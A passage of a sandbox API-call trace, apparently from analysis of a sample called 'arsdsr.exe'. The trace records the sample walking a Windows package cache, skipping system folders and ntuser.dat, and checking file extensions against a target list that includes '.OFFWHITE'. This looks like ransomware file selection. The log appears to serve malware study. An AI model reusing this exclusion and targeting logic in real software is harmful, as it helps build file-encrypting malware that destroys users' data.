ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.446] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.446] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.446] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.446] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.447] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="...") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$recycle.bin") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="rsa") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="programdata") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="appdata") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files") returned 1 [0148.447] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files (x86)") returned 1 [0148.447] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\" [0148.447] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0148.447] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" [0148.447] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" [0148.447] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0148.447] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.447] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.447] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.448] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.448] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.448] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x165257, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.448] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.448] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" [0148.448] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0148.448] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.448] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.448] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.448] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.448] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.448] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.448] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7a0c00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfd7a0c00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfd7a0c00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.448] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0148.448] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="...") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$recycle.bin") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="rsa") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="programdata") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="appdata") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files") returned 1 [0148.449] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files (x86)") returned 1 [0148.449] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\" [0148.449] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0148.449] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.449] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.449] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.449] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.450] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.450] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.450] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.450] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7a0c00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfd7a0c00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfd7a0c00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.450] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.450] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0148.450] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.450] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.450] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.450] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="...") returned 1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="windows") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="$recycle.bin") returned 1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="rsa") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="ntuser.dat") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="programdata") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="appdata") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="program files") returned -1 [0148.450] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="program files (x86)") returned -1 [0148.450] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.451] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0148.451] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\" [0148.451] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\" [0148.451] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*" [0148.451] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.451] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.451] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.451] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.451] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.451] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.451] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.452] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.452] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\" [0148.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0148.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\" [0148.452] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\" [0148.452] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" [0148.452] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.452] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.452] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.452] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.452] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.452] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="...") returned 1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$recycle.bin") returned 1 [0148.452] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="rsa") returned 1 [0148.453] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0148.453] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="programdata") returned 1 [0148.453] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="appdata") returned 1 [0148.453] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files") returned 1 [0148.453] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="program files (x86)") returned 1 [0148.453] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package 